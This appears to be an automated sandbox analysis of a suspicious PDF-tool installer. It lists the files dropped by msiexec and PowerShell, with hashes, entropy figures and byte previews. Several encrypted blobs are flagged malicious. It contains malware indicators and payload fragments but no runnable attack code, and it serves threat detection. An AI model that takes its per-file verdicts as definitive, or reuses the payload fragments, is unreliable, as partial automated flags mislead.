                                                                                                    Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326
                                                                                                    Entropy (8bit):3.1084234392766255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKIdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:i2kPlE99SNxAhUefit
                                                                                                    MD5:1580A2C317BEF4F22BB5335802E96576
                                                                                                    SHA1:AD34F28950F3593A4FB049C85F2DF9DDBFF831E2
                                                                                                    SHA-256:0C2097846B792E56E8299B018F29047B7FCFC577337C96ABEBD220DD4D425396
                                                                                                    SHA-512:1DD7DF27B6BAC152B7957D1CB3D285573D8DF2D554E23C5D7E9ECBFC5331262A9DB7F7CBC2C85BE90A7059BA4DFDF93C1DF48574E5DA35AB57CF8DAC5EFE9B71
                                                                                                    Malicious:false
                                                                                                    Preview: p...... ............V...(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11606
                                                                                                    Entropy (8bit):4.8910535897909355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                                                                    MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                                                                    SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                                                                    SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                                                                    SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                                                                    Malicious:false
                                                                                                    Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI29D3.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI35C.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI5DE.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI60E.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onmw5wn5.cah.psm1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rssalrkl.qll.ps1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxls3dep.5w5.ps1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0t0xluz.4b0.psm1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\a679308d-6b35-479b-82d4-9854e6a65464\Repository.ini
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):207
                                                                                                    Entropy (8bit):5.490504963280286
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:lXn9VoHQ8V31u6lJjl7bTqFRmxKytH/PB:RnbR8V3ZFljJPD
                                                                                                    MD5:90425674B41DE842D086FBD29CB20B4B
                                                                                                    SHA1:3EA07C4057AE2CB793F3CF68DA13D384818D199A
                                                                                                    SHA-256:C4065B319FC26BAE8167E75DC4BA9A229D805D550284FDDBE645585FF73D2E93
                                                                                                    SHA-512:1081AD897898AE7ABFC9F680D9EEE8109BBDA820C8610648FD57C21AA0390318D7648D245B7A9928D5055DE858368C9B1390969A7E6BDCCBCBA347AC8ECFEA35
                                                                                                    Malicious:false
                                                                                                    Preview: [OSInfo]..Win64=True..SuiteMask=256..Type=1..Major=10..Minior=0..Build=17134..[ProductInfo]..ProductName=(EMCO EVALUATION PACKAGE) - V2..ProductCode={92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..Manufacturer=LTD..
                                                                                                    C:\Users\user\AppData\Local\Temp\cad754e2-de01-4850-9beb-b967743c5645\Repository.ini
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):207
                                                                                                    Entropy (8bit):5.490504963280286
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:lXn9VoHQ8V31u6lJjl7bTqFRmxKytH/PB:RnbR8V3ZFljJPD
                                                                                                    MD5:90425674B41DE842D086FBD29CB20B4B
                                                                                                    SHA1:3EA07C4057AE2CB793F3CF68DA13D384818D199A
                                                                                                    SHA-256:C4065B319FC26BAE8167E75DC4BA9A229D805D550284FDDBE645585FF73D2E93
                                                                                                    SHA-512:1081AD897898AE7ABFC9F680D9EEE8109BBDA820C8610648FD57C21AA0390318D7648D245B7A9928D5055DE858368C9B1390969A7E6BDCCBCBA347AC8ECFEA35
                                                                                                    Malicious:false
                                                                                                    Preview: [OSInfo]..Win64=True..SuiteMask=256..Type=1..Major=10..Minior=0..Build=17134..[ProductInfo]..ProductName=(EMCO EVALUATION PACKAGE) - V2..ProductCode={92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..Manufacturer=LTD..
                                                                                                    C:\Users\user\AppData\Roaming\2WftOkjH2DTINpykLmMi2XBT65qk2NHPEPmp1ey8nolySJLrPHIgKlV41rr3Lgbv6SIiqgwF8WZn6CM6Yp2i9SpL59VEvZ9wljFHAhxgOT4YyYwTEx.bWtueHR+A318cQ==
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114
                                                                                                    Entropy (8bit):5.482772444004787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:zOtKVhgnBOcI+AxS2vp3694W9soSjwDq2RSEBxsh:GKAnXI+aFv52soQwDqQgh
                                                                                                    MD5:425EEA521EF26B88E4B4BB7B1FF7DFF9
                                                                                                    SHA1:6B370805E669A8254BEA5DE4B61923559EB92AD8
                                                                                                    SHA-256:81BC903B6B00E9BC9EB19D255307CD958C5364FBF452EC26EDEE44343CB2219A
                                                                                                    SHA-512:0407EC7D5C09DCD544F43B589F6DD1FDB455058D6C65B096E513009B1FCF4F927D76644473FCD8A990C7209D48E4BB901AC8557639A1ED21A21430BDD1358F68
                                                                                                    Malicious:false
                                                                                                    Preview: 2WftOkjH2DTINpykLmMi2XBT65qk2NHPEPmp1ey8nolySJLrPHIgKlV41rr3Lgbv6SIiqgwF8WZn6CM6Yp2i9SpL59VEvZ9wljFHAhxgOT4YyYwTEx
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ACDSRYjHaJFqblvp.QmpEytPRainlJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121685
                                                                                                    Entropy (8bit):7.998215175249978
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:fCksbePqeHuGrbNP6Zy9bkS35FraG8yHDVUkT6W51b:KEqeHuEbN6Ybh3jrQ8zT6+1b
                                                                                                    MD5:70DF42634084EBB4816060CECFF6A22E
                                                                                                    SHA1:6F776B9236C4BA3A2FF2B22C85629BD0DF298C12
                                                                                                    SHA-256:4461ECED229C6CCF66CAC33632805021EA64520030CEF27A7D6F265245861C1E
                                                                                                    SHA-512:A2EA3E3DA0FC9986076742D3334F9C24FF43D3B4F282834F847D2D5FA1FFD89F57BEF3C16197F360D875B96DD2E4538622A727B928860A069876543E36246FA8
                                                                                                    Malicious:true
                                                                                                    Preview: ~..XgX.u.dn......u.S...6..v@.....\..S<..5...R..........+.1H..G.f...X0=.9)_.$...p..w.f.O^z..".......|.Bh.P.n.L.5.?..}f.$.F.l.@5._.KM.K...y.35..n......t..f."w..|9..AQ....{~.![..*.....@X"z_.....Z?.Y....:..I....w...6x......]E'oc..a..P..m.).......E..^m.R.FM.k].$..0..4^..a....NfC)......M.........-.<...i...5:......DI<.T...yu...... p......._...{.l.`.`$.)*.].w.sV,tn....l0TJN...x.....X.....Hz$p,.....Y...RvV....w_..q.5.c.......Y..CD...#|f.s.*.22..! j,..y'...gz..Q2.L..NI...[..h.w......Z.g.0..C.............R.U..=.x...~.c5...~.......=....i..D..VP.g.!mE.sf;....k.. M.;.%.....9.pMl~Rp]............y.K.<.0..u.(n.4.Ra.H,cZy..L'.oR.g.3.4.U.a.........S.Lr..Xn..0.........D^n...R..j.A...#C..dp..[.S.>..#...b.pU..k,.....`R{t-B).f.....e.0.D.....Do..1.).y....;....p<.i"........l1....V..I.b.[G...;.Q.L..'..A..ub...$.w....Ls1.....gE...../.......n.B./........'D8C.0...[P.G..7..Y1..x....\..C<..YS.,.q...5.`..J4.7..^.."._...p@...So..,.B,]....)..q[...I[.R.6). *@fr-..2.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AEUqJVPnvMdHG.jhaPgeFzLwZTGcsA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):113635
                                                                                                    Entropy (8bit):7.9980894764652755
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:LLKAdKwLhp6lKb3BYUMTbClHxscHXg0SqfbfL3cORvgAHV7s:LLnlLnhBYxTXOxLhgAps
                                                                                                    MD5:8F2EB3A57E5DC6500B5DEAB5C7CF292C
                                                                                                    SHA1:6107FC078BACC1D70DA57095D529ACA944446F51
                                                                                                    SHA-256:5FDA0B77ABC880866F3E86C54E2C1F66B6FEEEBA7DE938861372BDCD7D725C49
                                                                                                    SHA-512:6165A681EB738F41B035EB0E35EA150D5BB23E4DA7FA558EE54C8F0142A46579256DAB22C0C8ADC86663BF918A5E363EBAA41BB69A1DA9C3EC11103A004D25A5
                                                                                                    Malicious:true
                                                                                                    Preview: y&..)R#y....l...[m Rv.....%".j.d.&..?...D,..z^.nJ..kg.'..,-..>.@.F.>...B.2.'.....c.....Kp9.t..x....../...p.5..E...MhR.....yHX.........=.?.8p....l..h&,..a.e...{f.<......P..k].Aq.q....X..#..ra...~...*.r...<....$0Q..TLY.....=*.....7.b.6....c....B.a<}1^e....I..4..%....rL..........p..S.A9$...M.!......!.w.......xW....8(......E...i._..DY....Z.!.....+..<3....rN....(=V.....E......5:U>fu.m%o........./5.&....P....U.G%.p.1..z.Az.3......w....X.c...ueT.{.....(.{....C..Q./..x\.......I..A..ln.Eq..sh#.$R$A.`>..^..u.>y...c....j....ff..u...).e`,....SyV..l...`!..8..Bv6....qH....\4N.+c{..[!.Z..3.h.....;...W...m+.Z..o.;.r.(.j\.>ur..._.4~#.Bpc>..".D.."Z^...Z...H........&.O...uG...WP.V..Wf$6.t..C..~...,~4e....@*..Q.c'7.mQ...z.~..*..1.f.?..J.(../.z.._...=.v.e.KT....v.....:....O.*@..........jb..Y_....4$.p.....q.e....k...%.;bi....4d....j."Z.....g......._k..v. S<.....Z.Hv^.U>F].q a..X..}$.v...|JNtf$P9.A..-.!$.......M.#.t[....L....L.'.h..............B...W..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AGLbdnliVrfmDtxBhzv.uOqxCwYEIdphnH
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58550
                                                                                                    Entropy (8bit):7.996523857172434
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:gMC/Ty7fOspCBlBafnb5ND3TsKFwbTL/p:4Ol5NzTsqgTLh
                                                                                                    MD5:CCFF9A7C5EF55E714743474327AB42F6
                                                                                                    SHA1:6D2BFC69B5D5B9F3A58EDB4282EF915EAC6431E5
                                                                                                    SHA-256:5D2A53FFB63BFEA03A5D18A1E617E0FCD38DBF953CC449A7526BB7CCC2B929CC
                                                                                                    SHA-512:52A4A1B955B7FA48DA6293924A611A4CA38ED1D019B97C039248B744E99843840DCE6868A8FCE2449EE538E402DE3DE14274DCC2940C33736603B1AD1A1A59CD
                                                                                                    Malicious:true
                                                                                                    Preview: .....%5...S..'..h)7.T....u.X..&.F...i..E..P..D.'b.k../E...Bo....I\V.H`..U.L.......r[....[=_.J.6..].t....+b...<.wy.NB.....".......]...g.g.,..g.j...A.Iw....... |<#.}...Z.8.!Oc9.z......>...y.U..W...Z\....X.H...B ...^g.o.....|T_$ ..."...s..a....4.yP....U.+...K..h.w..*..O...t..-..l.6......G.......B.%B...."..t...2.......]&.=X..3.j_*.".)]..|CO-....M.zo1@.).^l2~.Gfk....6.M.-..;.H.._...X]...........O....-.._....X..._@kZ6.[....SNT}.......z.R.R...uf....n.....q.._. ..e...H..L.M..p.=.o.(...,.~)..1.o..h.........."...`...|..rl.X.].G.O..IO.y.....{.._..3....Ok.5./.C.^M0.F..#......"fW..el....C-p.....v......5@.z..1~...etfK,q..l..w....\..b*i.u.>].S.L...]/Z.45X.F).L.G"%...!.j.-./.X...8,H5R,..sL..e.._.....Vv..h$...4....W..O.C.);"..R...k..g..&j..{.v.nP8.4\.c.,;nj....#.J~...._..6}.....5...-..T......+..e..w......R.......P.%...X...f...;..J...\...j....;:...@.f..."..3BA.3.W.!...VM....*N.\'\..}y.:.>.O(D........>t...D.e.S.^.it....T...aH..Rv5..#rO
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AIMcfPgWhH.HYLqKIlefgPpWDaGCN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):166447
                                                                                                    Entropy (8bit):7.998986603330671
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:EqYXheGkYwdyVfEvQr0IAtinnn2xjHGQx9k5TAMce5qvI3KxotD5+t2QWjS8ME+U:EqmAdGfWQwIAs2xPkae5qKcg1+sjSBEj
                                                                                                    MD5:D379BDC3C640A56828838E674307E57D
                                                                                                    SHA1:D13D6EFA8DF2C8856C4703AD5EFAFBE7FF1721F1
                                                                                                    SHA-256:1E97BF13EEAB98C89164804A6B656A99C9905C70EB1DAD88581F790162C0B745
                                                                                                    SHA-512:69F8C5557828748EB86BE40AEEEE1871C8DBD52A552D94D8EE615E01193F6ACCD7F6B8161A5C028CBD3553336ADA4C1F8BFB4CAE93852C45811BDE830B87A782
                                                                                                    Malicious:true
                                                                                                    Preview: .BX..W..}..C.....Ex.F...|.<.c/?/{G.H.X.A.....].CJ.TMa?.se.b.?.....8.|........a..V.........G^c..)..$..|....M.U_>.=..-.2o0..4.Y?N..w.s..fL\.5.Pz|!z..v\ .. ^..;~..`.lVSYfaL..v.&..8.#~....o=Ei..^.h.&. :i*v.}0......Q....C.)...5.K.e..j.r.T....u.xw.$i.>.SO.6.LF.....* ......)..et|.l..Q...X..mam...?...Wjt....p=z%......pC)`.w..}..(F.k..L.Q....Z......2&..Z!..f.%0H...\...T...[....M.=..........$6..1iY.G$aI..kZ_.F...8....%..).%...\.e..SM..x.1_j..j...p.."4. &Zq.L.....}....R....$)...z..d..l{-.}...h..M.l.=......<b...o.%..4.lIK.....?wt....'-...1.@.W...................%.a.JGp......O..{....5..0.C.z.H...+.kA.p,.J.!ICmB..tK..,W...H...b...U.T..Uw)..e.~.u.....u.*.(5!Y}$.....Y....A.^/0r].?.F..V9...-B..DAW...XR..:..I..........Y.....Q..R.WT.;..P.Zc./wi.wUcl....~..Bf..+!v...3.VR.(..TZP^.9..l....gs.V..7c.x.HC......*n...q..D...?...3j..u..Y.R...x=..qZ.:..3.)vbE.+5y.9..o..7.bh[..:.~...B.cd..h4Y....9..X...Kb.9..'h..P....(..]@[...S....&....u.).....b...D...}..R/.[&...G.l
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AOaZlcBEzKNnt.NWOhyYopIwtxs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):143526
                                                                                                    Entropy (8bit):7.998537012032547
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BHEPIYuxWHlM095TXNT84DJYiUq5cwFNeHC4zmmTPb+I/s:FEPI5xWHJ9xXCw5cMsHC4zHTPb+I/s
                                                                                                    MD5:F2A59C05DBF4EA33A9276EC7819F62F8
                                                                                                    SHA1:DAAF6B49FF7238F088ADDFA92CC4789FB6A10D94
                                                                                                    SHA-256:76278EDA7BB38E85BA45EA500F1B4C5E727757BB4052CA2A605D7FF12B3D2D4C
                                                                                                    SHA-512:BD819F8DDA5E914ADB06E4C4F2D554595E0A11A9A8C2BBC880618EC1D7C184A2B52725A8CEC0B8D533B4CA91998AC5E241F800434FBC025616557CEC8A60A16E
                                                                                                    Malicious:true
